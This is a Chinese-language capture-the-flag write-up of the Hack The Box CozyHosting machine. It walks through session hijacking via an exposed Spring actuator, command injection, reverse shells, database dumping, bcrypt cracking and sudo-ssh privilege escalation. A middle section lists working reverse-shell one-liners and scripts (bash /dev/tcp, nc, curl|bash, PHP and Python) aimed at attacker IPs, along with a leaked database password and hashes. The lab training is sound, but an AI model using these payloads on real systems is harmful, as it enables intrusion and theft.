HTB cozyhosting靶机记录

 很简单的一个主机，但对于我来说还是有点难度，总的来说跟wp过的，但也学了很多技术。

首先是要连到HTB的vpn，但是国内裸连延迟过高，带宽也很低，网速很慢，导致很多问题我一直以为是网络问题。

这里可以选择修改ovpn文件里的配置，将出口流量代理到自己的梯子上面来。首先是梯子需要开启允许本地局域网连接，也就是LAN

 其次在自己的ovpn文件加一行，“  socks-proxy 127.0.0.1 7890   ”，分别是梯子主机的ip和梯子端口号，对网络能有较好的改善。

然后正式开始渗透流程：

• 信息收集

Nmap对主机端口进行探测

$ nmap -A 10.10.11.230              
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-14 10:35 HKT
Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.86s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp    open     http        nginx 1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
|_http-server-header: nginx/1.18.0 (Ubuntu)
616/tcp   filtered sco-sysmgr
981/tcp   filtered unknown
1000/tcp  filtered cadlock
1141/tcp  filtered mxomss
1164/tcp  filtered qsm-proxy
1761/tcp  filtered landesk-rc
2042/tcp  filtered isis
2800/tcp  filtered acc-raid
3493/tcp  filtered nut
3659/tcp  filtered apple-sasl
8000/tcp  filtered http-alt
8001/tcp  filtered vcom-tunnel
8084/tcp  filtered websnp
8194/tcp  filtered sophos
8888/tcp  open     http        SimpleHTTPServer 0.6 (Python 3.10.12)
9110/tcp  filtered unknown
9418/tcp  filtered git
10082/tcp filtered amandaidx
22939/tcp filtered unknown
31038/tcp filtered unknown
56738/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 363.88 seconds

主要的信息在于22端口和80端口是开放的，至于这个8888这个端口开放原因是HTB的靶机是开放的，并不是只有你一个人在线，这对于我来说是个误导，我什么都没想就进了这个8888端口，发现是一个下载链接，但这是后续的步骤。

80端口的开放意味着我们可以访问靶机，但地址一直跳转到cozyhosting.htb这个域名，于是我们需要设置一下hosts文件

└─$ cat /etc/hosts
127.0.0.1       localhost
10.10.11.230    cozyhosting.htb

正常访问：

• 敏感目录扫描

 扫一下网站的目录：

─$ dirsearch -u http://cozyhosting.htb                                                

  _|. _ _  _  _  _ _|_    v0.4.2                                                           
 (_||| _) (/_(_|| (_| )                                                                    
                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927                                                                                          

Output File: /home/kali/.dirsearch/reports/cozyhosting.htb/_23-11-14_11-13-21.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-11-14_11-13-21.log

Target: http://cozyhosting.htb/

[11:13:22] Starting: 
[11:13:49] 200 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js
[11:13:58] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[11:14:00] 400 -  435B  - /a%5c.aspx                                        
[11:14:03] 200 -  634B  - /actuator                                         
[11:14:03] 200 -   15B  - /actuator/health                                  
[11:14:03] 200 -   98B  - /actuator/sessions                                
[11:14:04] 200 -    5KB - /actuator/env                                     
[11:14:04] 200 -   10KB - /actuator/mappings                                
[11:14:05] 401 -   97B  - /admin                                            
[11:14:06] 200 -  124KB - /actuator/beans                                   
[11:14:52] 200 -    0B  - /engine/classes/swfupload//swfupload.swf          
[11:14:52] 200 -    0B  - /engine/classes/swfupload//swfupload_f9.swf       
[11:14:53] 500 -   73B  - /error                                            
[11:14:53] 200 -    0B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/ 
[11:14:54] 200 -    0B  - /extjs/resources//charts.swf                      
[11:15:00] 200 -    0B  - /html/js/misc/swfupload//swfupload.swf            
[11:15:06] 200 -   12KB - /index                                            
[11:15:11] 200 -    4KB - /login                                            
[11:15:11] 200 -    0B  - /login.wdm%2e                                     
[11:15:12] 204 -    0B  - /logout                                           
[11:15:40] 400 -  435B  - /servlet/%C0%AE%C0%AE%C0%AF  

把每个界面都尝试一遍，在  /actuator/sessions发现历史session

 同时也发现访问/admin服务端认证失败并返回一个session，于是尝试能否用这个“kanderson”的session来访问/admin，使用cookie editor修改cookie：

访问/admin,成功以kanderson账户登录

• RCE突破

执行下面的请求框，抓包分析：

  手工测试一下发现就是一个ssh命令执行（ssh username@host ），并且几乎没有什么过滤（之过滤了空格），加上反引号之后命令执行结果能够直接返回，不加也能执行，就是没有返回结果

• 反弹shell

果断想反弹shell，于是补了一下反弹shell的几种方式：（参考链接：https://www.jianshu.com/p/9456473a0a14）

本地运行 nc -lvvp 1234  监听1234号端口然后配合下面这几种方式即可

bash反弹shell：

bash -i >& /dev/tcp/192.168.20.151/8080 0>&1

nc反弹shell：

 nc 192.168.31.151 7777 -t  /bin/bash
 命令详解：通过webshell我们可以使用nc命令直接建立一个tcp 8080 的会话连接，然后将本地的bash通过这个会话连接反弹给目标主机（192.168.31.151）。

curl反弹shell： 

 将bash反弹的一句话写在自己的web服务器的index下面，在目标主机上执行 curl 192.168.20.30 | bash

wget反弹 

在shell.txt中写下如下内容： 
<?php $sock=fsockopen("192.168.20.151",7777);//localhost为自己的外网ip，端口任意 
exec("/bin/sh -i <&3 >&3 2>&3"); ?> 
放在自己的web服务器的index

目标服务器执行： wget 192.168.20.130/shell.txt -O /tmp/x.php && php /tmp/x.php

python、php反弹

写下python脚本，放在本地web的index
#!/usr/bin/python
#-*- coding: utf-8 -*-
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.20.151",7777)) #更改localhost为自己的外网ip,端口任意
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
目标主机执行：
curl 192.168.20.30 | python
如果脚本为上述的php脚本，同样可以curl
curl 192.168.20.30 | php

获取shell：

•  文件分析

发现app用户的权限很小，但是目录下有一个文件 cloudhosting-0.0.1.jar,于是download到本地，这里也有好几种方法：

• python http.server

python -m http.server 8888  #在目标主机上运行http服务器，将本地目录作为根目录搭建一个下载服务器

远程可以直接通过浏览器或者wget进行下载

• nc

nc -nv  192.168.11.1 333 <  cloudhosting-0.0.1.jar

本地运行

nc -lvvp 333 >  cloudhosting-0.0.1.jar

对这个jar包进行解压与反编译，基于vscode的两个插件的两种方法，一种是将.jar改为.zip直接解压，用Extension Pack for Java进行反编译

另一种是用插件decompiler，创建一个项目后直接对.jar包进行反编译，这里比较推荐第二种，第一种的每个文件都得反编译一次，或者说我不知道怎么将项目里的.class文件一起反编译

反编译完成后发现敏感信息：

 

• 连接数据库

 看一下本地运行的服务：

app@cozyhosting:/app$ netstat -pantu
netstat -pantu
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5432          127.0.0.1:46174         ESTABLISHED -                   

确实有5432这个服务，准备连接数据库：（需要postgresql的相关知识，参考链接：https://www.cnblogs.com/echohye/p/17671650.html）

app@cozyhosting:/app$ psql -h localhost -p 5432 -U postgres -d cozyhosting -W
psql -h localhost -p 5432 -U postgres -d cozyhosting -W
Password: Vg&nvzAQ7XxR

\dt
         List of relations
 Schema | Name  | Type  |  Owner   
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)

\l
                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
(4 rows)

select * from users;
   name    |                           password                           | role  
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)

• 破解密码

密文是bcrypt的加密结果

bcrypt的加密方式如下：

常见的linux的加密方式标识如下：
• $1$: MD5-based crypt ('md5crypt')
• $2$: Blowfish-based crypt ('bcrypt')
• $sha1$: SHA-1-based crypt ('sha1crypt')
• $5$: SHA-256-based crypt ('sha256crypt')
• $6$: SHA-512-based crypt ('sha512crypt')

kali上有常见的密码破解工具 john，可以自动识别密文格式，自动暴力破解

kanderson的密码在代码里面已经有了，验证一下就可以，这里破解发现admin的密码，但却不是root的，试了半天结果是系统用户josh的，直接ssh登录

──(kali㉿kali)-[~]
└─$ ssh josh@10.10.11.230
josh@10.10.11.230's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)

Last login: Tue Nov 14 04:26:11 2023 from 10.10.14.189
josh@cozyhosting:~$ id
uid=1003(josh) gid=1003(josh) groups=1003(josh)
josh@cozyhosting:~$ 

用户目录下发现user.txt，提交flag，剩下的就是提权到root了，提权的操作我是纯新手，完全不懂，就参照wp了。

• 提权

查询用户的sudo命令，发现有ssh权限

josh@cozyhosting:~$ sudo -l
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
josh@cozyhosting:~$ 

参考：（https://gtfobins.github.io/gtfobins/ssh/#sudo）发现直接获取到root权限

 在root目录下直接放线root.txt，整个cozyhosting渗透完毕。